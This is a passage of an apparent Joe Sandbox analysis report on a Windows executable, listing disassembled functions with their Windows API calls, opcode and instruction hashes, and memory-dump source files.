                                                                                  • Instruction Fuzzy Hash: 0E218472A18B8181FA149BA5E44057AB3A4FF89BD0F985235EBDD03B95DF3CD191C740
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1875163511-0
                                                                                  • Opcode ID: 7fdfb8b08260a68de66ecd622df27e98485fdb680c183650925e5cdb3d7d3185
                                                                                  • Instruction ID: b85b56ebbee7d8eade3210a62f22bacd18d5a4919711655f9a52562c7de63ab6
                                                                                  • Opcode Fuzzy Hash: 7fdfb8b08260a68de66ecd622df27e98485fdb680c183650925e5cdb3d7d3185
                                                                                  • Instruction Fuzzy Hash: F1318322A0864661FBA4B754E4547B9E3A0FF50B84F9C4472E28C077A9EF6CD947C311
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1203560049-0
                                                                                  • Opcode ID: ac18a83a37a21749c7aa78aaec7704104475699d89f0dcb909fab837ee55c2e9
                                                                                  • Instruction ID: 6ced54dccf7b324464408a7eb239169347e5c5e2e31e8ccd43eeb156f9c02e6c
                                                                                  • Opcode Fuzzy Hash: ac18a83a37a21749c7aa78aaec7704104475699d89f0dcb909fab837ee55c2e9
                                                                                  • Instruction Fuzzy Hash: 7D21FB22A0878541FA20AB65E44566DA360FF88794F984275EA9D43694EF3CD542C620
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3118131910-0
                                                                                  • Opcode ID: a0ef641f18d862fb2ede747b4f7a5cd70e7cdd2a52a9d3b4729baac44d7eebee
                                                                                  • Instruction ID: 713b099ff90023136cb2ee4ea035530340a26cdeda44caa9bba490da3818da5c
                                                                                  • Opcode Fuzzy Hash: a0ef641f18d862fb2ede747b4f7a5cd70e7cdd2a52a9d3b4729baac44d7eebee
                                                                                  • Instruction Fuzzy Hash: 8221F832A1878581FE50AB64F44462EA360FF98BD4F940274EAED42A99DF3CD542C720
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1203560049-0
                                                                                  • Opcode ID: bb03d890145153a6389d317eee9ce9bd5a67d6f121021ec7dbe6c19775fb5f48
                                                                                  • Instruction ID: 8c9e9c673043d659c6900f2a9de59756b7b451d5daf32bb15fd07d2820dfdf4e
                                                                                  • Opcode Fuzzy Hash: bb03d890145153a6389d317eee9ce9bd5a67d6f121021ec7dbe6c19775fb5f48
                                                                                  • Instruction Fuzzy Hash: 0F21B632A1878581FA50AB68F44452AA361FFC87A4F981371EAED43BD5DF3CD442C720
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                  • Instruction ID: 801516d5d6e264c4a6b3b8fd16429d1b1c5763e1d57c29e4fb22381f93fcf3fa
                                                                                  • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                  • Instruction Fuzzy Hash: C7E01A24A0430686FB947BA19895B79A362AF9CB41F5844BCC84A42396CE3DE80A8760
                                                                                  APIs
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75AAAF895
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75AAAF89B
                                                                                    • Part of subcall function 00007FF75AAB3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF75AAC0811), ref: 00007FF75AAB3EFD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 3587649625-0
                                                                                  • Opcode ID: 390f1a2edb2631e53b1801632849d54f8c861f77ec1a095bbc779a2a96df894f
                                                                                  • Instruction ID: 19cf63877376bc63281bf73a0aed9789bc51df2a3f4dde88a9b808c02324b46f
                                                                                  • Opcode Fuzzy Hash: 390f1a2edb2631e53b1801632849d54f8c861f77ec1a095bbc779a2a96df894f
                                                                                  • Instruction Fuzzy Hash: F191C233A1878194FB14EFA4D4406ADA3A1FF84798FD84176EA4C07AE9DF78D546C3A0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 08a22ae537fb238a79d2cd958e2f999ccce0ea13b41feda8d349708073189f75
                                                                                  • Instruction ID: b93fb52862446ed6006537e024462e696e766356fdb5e688bb14fcb8d48388da
                                                                                  • Opcode Fuzzy Hash: 08a22ae537fb238a79d2cd958e2f999ccce0ea13b41feda8d349708073189f75
                                                                                  • Instruction Fuzzy Hash: 0141E462F1465284FB00EBF1D450AFDA3A0AF44BD8F985175EE5D27AD9DE38D4838360
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF75AAB274D), ref: 00007FF75AAB28A9
                                                                                  • GetLastError.KERNEL32(?,00007FF75AAB274D), ref: 00007FF75AAB28B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                  • Instruction ID: 8e498baa4fbc075751d4094fea0b1ed6e59de6c8becea6b843af3034859f1fa5
                                                                                  • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                  • Instruction Fuzzy Hash: 1E311A32B19B4A41FA606BE6D540EB5A350AF04BD4F8C0172DE1D177A4EE3CDC478320
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1746051919-0
                                                                                  • Opcode ID: bec8d0c1c672d295977e9fc10f39d8f626ff81b9c2385a5dbc8c6e1febdb5a1a
                                                                                  • Instruction ID: 479f88536eea42ab96380cba4f0ab1872429df9b16a30610936212e40d66a1bf
                                                                                  • Opcode Fuzzy Hash: bec8d0c1c672d295977e9fc10f39d8f626ff81b9c2385a5dbc8c6e1febdb5a1a
                                                                                  • Instruction Fuzzy Hash: 7831F422A1874145FA54AB95E44477EF3A0EF85790F884231EB9C07BE5EF3CE496C760
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$BuffersFlushTime
                                                                                  • String ID:
                                                                                  • API String ID: 1392018926-0
                                                                                  • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                  • Instruction ID: 5adfaf30fc2d46847fe7170dc3f7bf8d09140a021a659ab7aa9b3551840fd75a
                                                                                  • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                  • Instruction Fuzzy Hash: D221E222E09B4A91FA62AE91D410BBAD790AF05794F9840B2DE4C02295FE3CDD8BC310
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString
                                                                                  • String ID:
                                                                                  • API String ID: 2948472770-0
                                                                                  • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                  • Instruction ID: 77746e46da84d95070aa81f8875e2f815f4ef9d61a8fadf19a53f65334294be0
                                                                                  • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                  • Instruction Fuzzy Hash: 22118E70B0874586FA00AF1AA844868F7A1BF89FC0BD84479CA1D93724EF7CE9818394
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                  • Instruction ID: 6fb8ac67fbd30a3010aa3f8e9bb18654d3fb17865295451b43db954d9f27cc5b
                                                                                  • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                  • Instruction Fuzzy Hash: 2B11D221A0874581FB61AB65E840A79A360FF55BB4F984772DA3D122D4EF3CD987C310
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemRectTextWindow$Clientswprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3322643685-0
                                                                                  • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                  • Instruction ID: 7c0978bbb1d632da59ab4973463a7a16ff729ff0feac99771fa403cd21322c1f
                                                                                  • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                  • Instruction Fuzzy Hash: 2C015220A0974B41FE59B7D1A454B79D7917F45744F8C00B9C84D062E9EE2CE8DA8360
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF75AABEBAD,?,?,?,?,00007FF75AAB5752,?,?,?,00007FF75AAB56DE), ref: 00007FF75AABEB5C
                                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF75AABEB6F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                  • String ID:
                                                                                  • API String ID: 1231390398-0
                                                                                  • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                  • Instruction ID: 56be7a67caec554692b7d0fb6da001b229eb1c6a78f9c1615597b4488f247569
                                                                                  • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                  • Instruction Fuzzy Hash: 8DE02B61F1468A82EF589F99C4408E9B392BFC8B40BC88039D60B83614DE2CE5468B00
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1173176844-0
                                                                                  • Opcode ID: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                                  • Instruction ID: 60e428e10bd6f78f27b87d767e92b7cbb785e76b31215711172d8308febd57fc
                                                                                  • Opcode Fuzzy Hash: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                                  • Instruction Fuzzy Hash: EFE0EC70E0920741FA9832F218269B580904F69770EDC5BF4EAFE052D6BD1CA49BC170
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 485612231-0
                                                                                  • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                  • Instruction ID: 9405b13151dd6febd9e78a13a48dc8a18bfd5a6b557ab4becee5d2cdcf49e2ad
                                                                                  • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                  • Instruction Fuzzy Hash: 8CE08690E0A14342FF44BBF2980597497D05FA8750F8C04B4C94D86252EE3D94838270
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: eaabdaa8850150cc0ece2f2f1474b33a95fa1a6fec094405e9f66626a5bb54a1
                                                                                  • Instruction ID: 783c53b7953b8b74ba4c0579fa3ffeecee507feebee7f19e74df25a75931df00
                                                                                  • Opcode Fuzzy Hash: eaabdaa8850150cc0ece2f2f1474b33a95fa1a6fec094405e9f66626a5bb54a1
